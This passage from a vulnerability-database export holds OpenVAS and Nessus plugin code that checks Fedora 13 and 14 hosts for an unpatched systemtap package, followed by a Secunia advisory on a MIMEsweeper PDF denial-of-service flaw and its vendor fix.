exit(0);\n\nres = \"\";\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"systemtap\", rpm:\"systemtap~1.4~6.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:55", "bulletinFamily": "scanner", "description": "Check for the Version of systemtap", "modified": "2017-07-10T00:00:00", "published": "2011-06-03T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=863107", "id": "OPENVAS:863107", "title": "Fedora Update for systemtap FEDORA-2011-7302", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for systemtap FEDORA-2011-7302\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"systemtap on Fedora 14\";\ntag_insight = \"SystemTap is an instrumentation system for systems running Linux 2.6.\n Developers can write instrumentation to collect data on the operation\n of the system.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-May/060790.html\");\n script_id(863107);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-03 09:20:26 +0200 (Fri, 03 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-7302\");\n script_cve_id(\"CVE-2011-1781\", \"CVE-2011-1769\", \"CVE-2010-4170\", \"CVE-2010-4171\");\n script_name(\"Fedora Update for systemtap FEDORA-2011-7302\");\n\n script_summary(\"Check for the Version of systemtap\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"systemtap\", rpm:\"systemtap~1.4~6.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:02", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-06-03T00:00:00", "id": "OPENVAS:1361412562310863106", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863106", "title": "Fedora Update for systemtap FEDORA-2011-7289", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for systemtap FEDORA-2011-7289\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-May/060810.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863106\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-03 09:20:26 +0200 (Fri, 03 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-7289\");\n script_cve_id(\"CVE-2011-1781\", \"CVE-2011-1769\", \"CVE-2010-4170\", \"CVE-2010-4171\");\n script_name(\"Fedora Update for systemtap FEDORA-2011-7289\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'systemtap'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC13\");\n script_tag(name:\"affected\", value:\"systemtap on Fedora 13\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"systemtap\", rpm:\"systemtap~1.4~6.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-11-01T02:26:54", "bulletinFamily": "scanner", "description": "Two divide-by-zero flaws were found in the way systemtap interpreted\ncertain corrupted DWARF expressions. A privileged user able to execute\narbitrary systemtap scripts could be tricked into triggering this flaw\nto crash the target machine. An unprivileged user (in the stapusr\ngroup) may be able to trigger this flaw to crash the target machine,\nonly if unprivileged mode was enabled by the system administrator.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2011-7289.NASL", "href": "https://www.tenable.com/plugins/nessus/54835", "published": "2011-05-27T00:00:00", "title": "Fedora 13 : systemtap-1.4-6.fc13 (2011-7289)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-7289.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(54835);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/10/16 10:34:21\");\n\n script_cve_id(\"CVE-2010-4170\", \"CVE-2011-1769\", \"CVE-2011-1781\");\n script_xref(name:\"FEDORA\", value:\"2011-7289\");\n\n script_name(english:\"Fedora 13 : systemtap-1.4-6.fc13 (2011-7289)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two divide-by-zero flaws were found in the way systemtap interpreted\ncertain corrupted DWARF expressions. A privileged user able to execute\narbitrary systemtap scripts could be tricked into triggering this flaw\nto crash the target machine. An unprivileged user (in the stapusr\ngroup) may be able to trigger this flaw to crash the target machine,\nonly if unprivileged mode was enabled by the system administrator.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=702687\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=703972\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-May/060810.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b38355e3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected systemtap package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SystemTap MODPROBE_OPTIONS Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:systemtap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:13\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^13([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 13.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC13\", reference:\"systemtap-1.4-6.fc13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"systemtap\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:26:54", "bulletinFamily": "scanner", "description": "Two divide-by-zero flaws were found in the way systemtap interpreted\ncertain corrupted DWARF expressions. A privileged user able to execute\narbitrary systemtap scripts could be tricked into triggering this flaw\nto crash the target machine. An unprivileged user (in the stapusr\ngroup) may be able to trigger this flaw to crash the target machine,\nonly if unprivileged mode was enabled by the system administrator.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2011-7302.NASL", "href": "https://www.tenable.com/plugins/nessus/54836", "published": "2011-05-27T00:00:00", "title": "Fedora 14 : systemtap-1.4-6.fc14 (2011-7302)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-7302.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(54836);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/10/16 10:34:21\");\n\n script_cve_id(\"CVE-2010-4170\", \"CVE-2011-1769\", \"CVE-2011-1781\");\n script_xref(name:\"FEDORA\", value:\"2011-7302\");\n\n script_name(english:\"Fedora 14 : systemtap-1.4-6.fc14 (2011-7302)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two divide-by-zero flaws were found in the way systemtap interpreted\ncertain corrupted DWARF expressions. A privileged user able to execute\narbitrary systemtap scripts could be tricked into triggering this flaw\nto crash the target machine. An unprivileged user (in the stapusr\ngroup) may be able to trigger this flaw to crash the target machine,\nonly if unprivileged mode was enabled by the system administrator.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=702687\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=703972\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-May/060790.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?71daa30b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected systemtap package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SystemTap MODPROBE_OPTIONS Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:systemtap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"systemtap-1.4-6.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"systemtap\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nMIMEsweeper for SMTP PDF File Processing Denial of Service\r\n\r\nSECUNIA ADVISORY ID:\r\nSA13411\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/13411/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nDoS\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nMIMEsweeper for SMTP 5.x\r\nhttp://secunia.com/product/4235/\r\n\r\nDESCRIPTION:\r\nA vulnerability has been reported in MIMEsweeper for SMTP, which can\r\nbe exploited by malicious people to cause a DoS (Denial of Service).\r\n\r\nThe vulnerability is caused due to an error within the Security\r\nService when processing PDF files. This can be exploited to crash the\r\nSecurity Service by sending an email containing a specially crafted\r\nPDF file as attachment.\r\n\r\nSOLUTION:\r\nApply MIMEsweeper for SMTP 5.0 Service Pack 1:\r\nhttp://www.clearswift.com/download/info.aspx?ID=562\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nReported by vendor.\r\n\r\nORIGINAL ADVISORY:\r\nhttp://download.mimesweeper.com/www/TechnicalDocumentation/SmtpReadMe50SP1.htm\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2004-12-11T00:00:00", "published": "2004-12-11T00:00:00", "id": "SECURITYVULNS:DOC:7314", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7314", "title": "[SA13411] MIMEsweeper for SMTP PDF File Processing Denial of Service", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}